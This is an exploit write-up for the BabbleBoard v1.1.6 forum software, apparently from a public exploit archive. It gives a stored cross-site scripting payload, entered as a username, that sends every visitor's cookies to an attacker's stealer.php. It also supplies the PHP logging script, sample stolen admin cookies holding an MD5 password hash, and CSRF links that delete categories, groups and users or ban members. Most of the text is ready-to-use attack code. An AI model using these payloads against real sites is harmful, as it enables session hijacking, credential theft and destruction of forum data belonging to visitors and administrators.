################## [+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF [+] Discovered By SirGod [+] Greetz : All my friends ################## [+] Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : <script>document.location ="http://[yourdomain]/[path]/stealer.php?cookie=" + document.cookie;</script> Everyone who visit the index page will be redirected on your cookie grabber. (because you will be the Latest Member) Be sure that you use " and not ' because is forbbiden to use that char is your username. 2 . In stealer.php use the following code (simple cookie grabber) <?php $cookie = $_GET['cookie']; $log = fopen("log.txt", "a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Make sure that you have in the stealer.php directory a file log.txt . For stealed cookies check log.txt . 3 . You will grab every visitor cookie . Example (cookie) of a not logged in user : PHPSESSID=gtolfce6jppb4oasfm81efrqf6 Example (cookie) of a logged in user (admin) : bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc; PHPSESSID=gtolfce6jppb4oasfm81efrqf6 Username is bb_name.Password is bb_password and is hashed as md5. [+] Cross Site Request Forgery If a logged in user with administrative permissions click one of the following links the specified action will be executed. - Delete category http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID] http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5 - Delete group http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID] http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2 - Ban User http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID] http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4 - Delete User http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID] http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4 ##################